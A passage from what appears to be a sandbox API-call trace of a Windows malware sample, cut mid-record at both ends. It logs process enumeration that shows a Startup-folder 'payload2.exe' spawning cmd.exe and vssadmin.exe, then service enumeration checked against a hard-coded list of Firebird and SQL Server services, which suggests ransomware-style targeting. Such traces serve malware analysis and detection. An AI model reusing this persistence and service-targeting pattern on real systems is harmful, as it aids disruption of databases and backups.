pcPriClassBase=8, dwFlags=0x0, szExeFile="pgp prix.exe")) returned 1 [0050.232] lstrlenW (lpString="pgp prix.exe") returned 12 [0050.232] Process32NextW (in: hSnapshot=0x21c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="user-reno.exe")) returned 1 [0050.232] lstrlenW (lpString="user-reno.exe") returned 13 [0050.232] Process32NextW (in: hSnapshot=0x21c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="aggregate.exe")) returned 1 [0050.233] lstrlenW (lpString="aggregate.exe") returned 13 [0050.233] Process32NextW (in: hSnapshot=0x21c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dressed.exe")) returned 1 [0050.282] lstrlenW (lpString="dressed.exe") returned 11 [0050.282] Process32NextW (in: hSnapshot=0x21c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="accounts evaluated jr.exe")) returned 1 [0050.283] lstrlenW (lpString="accounts evaluated jr.exe") returned 25 [0050.283] Process32NextW (in: hSnapshot=0x21c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vulnerability_joined_liechtenstein.exe")) returned 1 [0050.283] lstrlenW (lpString="vulnerability_joined_liechtenstein.exe") returned 38 [0050.283] Process32NextW (in: hSnapshot=0x21c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="developing.exe")) returned 1 [0050.284] lstrlenW (lpString="developing.exe") returned 14 [0050.284] Process32NextW (in: hSnapshot=0x21c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="supported.exe")) returned 1 [0050.285] lstrlenW (lpString="supported.exe") returned 13 [0050.285] Process32NextW (in: hSnapshot=0x21c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x724, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="girlstionselect.exe")) returned 1 [0050.285] lstrlenW (lpString="girlstionselect.exe") returned 19 [0050.285] Process32NextW (in: hSnapshot=0x21c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="employedboysdesktop.exe")) returned 1 [0050.286] lstrlenW (lpString="employedboysdesktop.exe") returned 23 [0050.286] Process32NextW (in: hSnapshot=0x21c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="clay_enquiry_thee.exe")) returned 1 [0050.286] lstrlenW (lpString="clay_enquiry_thee.exe") returned 21 [0050.287] Process32NextW (in: hSnapshot=0x21c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="eating.exe")) returned 1 [0050.287] lstrlenW (lpString="eating.exe") returned 10 [0050.287] Process32NextW (in: hSnapshot=0x21c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="nh_protected.exe")) returned 1 [0050.288] lstrlenW (lpString="nh_protected.exe") returned 16 [0050.288] Process32NextW (in: hSnapshot=0x21c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vulnerability.exe")) returned 1 [0050.288] lstrlenW (lpString="vulnerability.exe") returned 17 [0050.288] Process32NextW (in: hSnapshot=0x21c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="incidentoceaneast.exe")) returned 1 [0050.289] lstrlenW (lpString="incidentoceaneast.exe") returned 21 [0050.289] Process32NextW (in: hSnapshot=0x21c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ment_lo_animation.exe")) returned 1 [0050.290] lstrlenW (lpString="ment_lo_animation.exe") returned 21 [0050.290] Process32NextW (in: hSnapshot=0x21c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="counters_config_prostate.exe")) returned 1 [0050.290] lstrlenW (lpString="counters_config_prostate.exe") returned 28 [0050.290] Process32NextW (in: hSnapshot=0x21c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="teethpichuntercrude.exe")) returned 1 [0050.291] lstrlenW (lpString="teethpichuntercrude.exe") returned 23 [0050.291] Process32NextW (in: hSnapshot=0x21c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x814, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0050.292] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0050.292] Process32NextW (in: hSnapshot=0x21c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cprogramdatamicrosoftwindowsstart menuprogramsstartuppayload2.exe")) returned 1 [0050.292] lstrlenW (lpString="cprogramdatamicrosoftwindowsstart menuprogramsstartuppayload2.exe") returned 65 [0050.292] Process32NextW (in: hSnapshot=0x21c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x9a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0050.293] lstrlenW (lpString="cmd.exe") returned 7 [0050.293] Process32NextW (in: hSnapshot=0x21c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0050.293] lstrlenW (lpString="conhost.exe") returned 11 [0050.293] Process32NextW (in: hSnapshot=0x21c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x9b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0050.294] lstrlenW (lpString="vssadmin.exe") returned 12 [0050.294] Process32NextW (in: hSnapshot=0x21c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xabc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0050.295] lstrlenW (lpString="VSSVC.exe") returned 9 [0050.295] Process32NextW (in: hSnapshot=0x21c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0050.295] lstrlenW (lpString="svchost.exe") returned 11 [0050.295] Process32NextW (in: hSnapshot=0x21c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0050.296] CloseHandle (hObject=0x21c) returned 1 [0050.296] Sleep (dwMilliseconds=0x1f4) [0050.840] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x680490 [0050.840] EnumServicesStatusExW (in: hSCManager=0x680490, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0) returned 0 [0050.840] GetLastError () returned 0xea [0050.840] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x12c6) returned 0x3940ef0 [0050.840] EnumServicesStatusExW (in: hSCManager=0x680490, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3940ef0, cbBufSize=0x12c6, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3940ef0, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0) returned 1 [0050.841] CloseServiceHandle (hSCObject=0x680490) returned 1 [0050.841] lstrlenW (lpString="Appinfo") returned 7 [0050.841] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0050.841] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0050.841] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0050.841] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0050.841] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0050.841] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0050.841] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0050.841] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0050.841] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0050.841] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0050.841] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0050.841] lstrlenW (lpString="AudioSrv") returned 8 [0050.841] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0050.841] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0050.842] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0050.842] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0050.842] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0050.842] lstrlenW (lpString="BFE") returned 3 [0050.842] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0050.842] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0050.842] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0050.842] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0050.842] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0050.842] lstrlenW (lpString="CryptSvc") returned 8 [0050.842] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0050.842] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0050.842] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0050.842] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0050.842] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0050.842] lstrlenW (lpString="CscService") returned 10 [0050.842] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0050.842] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0050.842] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0050.842] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0050.842] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0050.842] lstrlenW (lpString="DcomLaunch") returned 10 [0050.842] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0050.842] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0050.842] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0050.842] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0050.842] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0050.843] lstrlenW (lpString="Dhcp") returned 4 [0050.847] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0050.847] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0050.847] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0050.847] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0050.847] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0050.847] lstrlenW (lpString="Dnscache") returned 8 [0050.847] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0050.847] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0050.847] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0050.847] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0050.847] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0050.847] lstrlenW (lpString="DPS") returned 3 [0050.847] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0050.847] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0050.847] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0050.847] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0050.847] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0050.847] lstrlenW (lpString="eventlog") returned 8 [0050.847] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0050.847] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0050.847] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0050.847] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0050.847] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0050.848] lstrlenW (lpString="EventSystem") returned 11 [0050.848] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0050.848] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0050.848] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0050.848] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0050.848] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0050.848] lstrlenW (lpString="gpsvc") returned 5 [0050.848] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0050.848] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0050.848] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0050.848] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0050.848] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0050.848] lstrlenW (lpString="iphlpsvc") returned 8 [0050.848] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0050.848] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0050.848] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0050.848] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0050.848] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0050.848] lstrlenW (lpString="LanmanServer") returned 12 [0050.848] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0050.848] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0050.848] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0050.848] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0050.848] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0050.848] lstrlenW (lpString="LanmanWorkstation") returned 17 [0050.848] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0050.848] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0050.849] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0050.849] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0050.849] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0050.849] lstrlenW (lpString="lmhosts") returned 7 [0050.849] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0050.849] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0050.849] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0050.849] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0050.849] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0050.849] lstrlenW (lpString="MMCSS") returned 5 [0050.849] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0050.849] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0050.849] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0050.849] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0050.849] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0050.849] lstrlenW (lpString="MpsSvc") returned 6 [0050.849] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0050.849] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0050.849] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0050.849] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0050.849] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0050.849] lstrlenW (lpString="Netman") returned 6 [0050.849] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0050.849] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0050.849] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0050.849] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0050.849] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0050.849] lstrlenW (lpString="netprofm") returned 8 [0050.849] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0050.849] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0050.849] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0050.849] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0050.849] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0050.849] lstrlenW (lpString="NlaSvc") returned 6 [0050.849] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0050.849] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0050.849] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0050.850] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0050.850] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0050.850] lstrlenW (lpString="nsi") returned 3 [0050.850] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0050.850] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0050.850] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0050.850] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0050.850] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0050.850] lstrlenW (lpString="PcaSvc") returned 6 [0050.850] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0050.850] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0050.850] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0050.850] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0050.850] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0050.850] lstrlenW (lpString="PlugPlay") returned 8 [0050.850] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0050.850] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0050.850] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0050.850] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0050.850] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0050.850] lstrlenW (lpString="Power") returned 5 [0050.850] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0050.850] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0050.850] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0050.850] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0050.850] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0050.850] lstrlenW (lpString="ProfSvc") returned 7 [0050.850] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0050.850] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0050.850] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0050.850] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0050.850] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0050.850] lstrlenW (lpString="RpcEptMapper") returned 12 [0050.850] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0050.850] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0050.850] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0050.850] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0050.851] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0050.851] lstrlenW (lpString="RpcSs") returned 5 [0050.851] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0050.851] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0050.851] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0050.851] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0050.851] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0050.851] lstrlenW (lpString="SamSs") returned 5 [0050.851] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0050.851] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0050.851] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0050.851] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0050.851] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0050.851] lstrlenW (lpString="Schedule") returned 8 [0050.851] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0050.851] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0050.851] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0050.851] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0050.851] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0050.851] lstrlenW (lpString="SENS") returned 4 [0050.851] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0050.851] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0050.851] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0050.851] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0050.851] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0050.851] lstrlenW (lpString="ShellHWDetection") returned 16 [0050.851] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0050.851] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0050.851] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0050.851] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0050.851] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0050.851] lstrlenW (lpString="Spooler") returned 7 [0050.851] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0050.851] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0050.851] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0050.851] 